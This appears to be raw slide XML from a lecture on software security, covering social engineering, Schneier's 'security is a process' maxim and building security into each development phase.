              <a:t>siteid=0&amp;co_partnerid=2&amp;usage=0&amp;ru=http%3A%2F</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%2Fwww.ebay.com&amp;rafId=0&amp;encRafId=default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>…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Social engineering – a positive aspect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31825" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="631825" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="631825" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(Dec 2005) A child pornographer </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>turned himself in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to the police after receiving </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>a virus e-mail saying “An investigation is underway…”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="631825" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="631825" indent="0" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Unfortunately, that’s the only happy-end story </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>about social engineering that I know of.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37892" name="Picture 4" descr="happ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00" y="2492375"/>
            <a:ext cx="488950" cy="490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3" name="Picture 5" descr="sad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00" y="4005263"/>
            <a:ext cx="48895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Further reading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endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	Kevin D. Mitnick </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>The Art of Deception: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	Controlling the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	Human Element </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>	of Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916" name="Picture 4" descr="cover-ao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6338" y="1838325"/>
            <a:ext cx="1968500" cy="2973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Being paranoid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It is not that bad to be paranoid </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(sometimes)</a:t>
            </a:r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example: the idea of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SETI virus </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>“Alien radio signals could pose </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>a security risk, and should </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>be ‘decontaminated’ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>before being analyzed”)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" u="sng" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://home.fnal.gov/~carrigan/SETI/SETI_Hacker.htm </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-396832">
            <a:off x="4641850" y="5364163"/>
            <a:ext cx="4214813" cy="554037"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B8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45" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>OK, maybe this is too paranoid…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39941" name="Group 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6300788" y="1217613"/>
            <a:ext cx="2590800" cy="3121025"/>
            <a:chOff x="4375" y="845"/>
            <a:chExt cx="1800" cy="2168"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39942" name="Picture 6" descr="leifpe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75" y="893"/>
              <a:ext cx="1600" cy="2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9943" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="5481" y="1327"/>
              <a:ext cx="1176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82945" tIns="41473" rIns="82945" bIns="41473">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr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sz="1500"/>
                <a:t>From leifpeng.com</a:t>
              </a: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Messages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3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security is a process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" smtClean="0"/>
              <a:t>, not a product *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400" smtClean="0"/>
              <a:t>threat modeling, risk assessment, security policies, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>security measures etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protection, detection, reaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100" smtClean="0"/>
              <a:t>Security thru obscurity will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" smtClean="0"/>
              <a:t> work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0"/>
              <a:t>Threats (and solutions) are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not only technical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400" smtClean="0"/>
              <a:t>social engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="150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150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1500" smtClean="0"/>
              <a:t>* B. Schneier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0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> 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lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Magneto" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Magneto" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Bernard MT Condensed" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Security in Different Phases </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4300" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Bernard MT Condensed" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>of Software Development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Outline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440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endParaRPr lang="en-US" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>System architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Code design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Testing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Software is vulnerable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45060" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="467545" y="785813"/>
            <a:ext cx="7533456" cy="5739531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill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45" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>Secunia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> security advisories from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>a single day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955124" y="1268760"/>
            <a:ext cx="6713220" cy="5154528"/>
            <a:chOff x="1259632" y="1340768"/>
            <a:chExt cx="6713220" cy="5154528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59632" y="1340768"/>
              <a:ext cx="6713220" cy="1524000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59632" y="2852936"/>
              <a:ext cx="6713220" cy="3642360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When to start?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>
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> should be foreseen as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>part of the system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> from the very beginning, not added as a layer at the end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>the latter solution produces insecure code </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(tricky patches instead of neat solutions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>it may limit functionality </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and will cost much more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pl-PL" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can’t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>add security in version 2.0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Software development life-cycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="412750" y="1838325"/>
            <a:ext cx="2292350" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50139"/>
              <a:gd name="adj2" fmla="val 21148"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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82945" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1173163" y="2460625"/>
            <a:ext cx="2292350" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50139"/>
              <a:gd name="adj2" fmla="val 23116"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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82945" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1933575" y="3082925"/>
            <a:ext cx="2292350" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50139"/>
              <a:gd name="adj2" fmla="val 21148"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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82945" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2693988" y="3705225"/>
            <a:ext cx="2292350" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50139"/>
              <a:gd name="adj2" fmla="val 23116"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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82945" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47111" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3454400" y="4327525"/>
            <a:ext cx="2292350" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50139"/>
              <a:gd name="adj2" fmla="val 21148"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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82945" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>deployment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47112" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="4949825"/>
            <a:ext cx="2365375" cy="484188"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50065"/>
              <a:gd name="adj2" fmla="val 23116"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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82945" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>maintenance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47113" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="2809081" y="2047082"/>
            <a:ext cx="346075" cy="414338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2912 h 21600"/>
              <a:gd name="T14" fmla="*/ 18227 w 21600"/>
              <a:gd name="T15" fmla="*/ 9246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lnTo>
                  <a:pt x="21600" y="6079"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="008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47114" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3569494" y="2634457"/>
            <a:ext cx="346075" cy="414337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2912 h 21600"/>
              <a:gd name="T14" fmla="*/ 18227 w 21600"/>
              <a:gd name="T15" fmla="*/ 9246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lnTo>
                  <a:pt x="21600" y="6079"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="008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47115" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4329906" y="3256757"/>
            <a:ext cx="346075" cy="414338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2912 h 21600"/>
              <a:gd name="T14" fmla="*/ 18227 w 21600"/>
              <a:gd name="T15" fmla="*/ 9246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lnTo>
                  <a:pt x="21600" y="6079"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="008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47116" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5090319" y="3879057"/>
            <a:ext cx="346075" cy="414337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2912 h 21600"/>
              <a:gd name="T14" fmla="*/ 18227 w 21600"/>
              <a:gd name="T15" fmla="*/ 9246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lnTo>
                  <a:pt x="21600" y="6079"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="008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47117" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5851525" y="4500563"/>
            <a:ext cx="344487" cy="414338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2912 h 21600"/>
              <a:gd name="T14" fmla="*/ 18227 w 21600"/>
              <a:gd name="T15" fmla="*/ 9246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lnTo>
                  <a:pt x="21600" y="6079"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="008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47118" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="793750" y="4579938"/>
            <a:ext cx="739775" cy="7874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2912 h 21600"/>
              <a:gd name="T14" fmla="*/ 18227 w 21600"/>
              <a:gd name="T15" fmla="*/ 9246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lnTo>
                  <a:pt x="21600" y="6079"/>
                </a:lnTo>
                <a:close/>
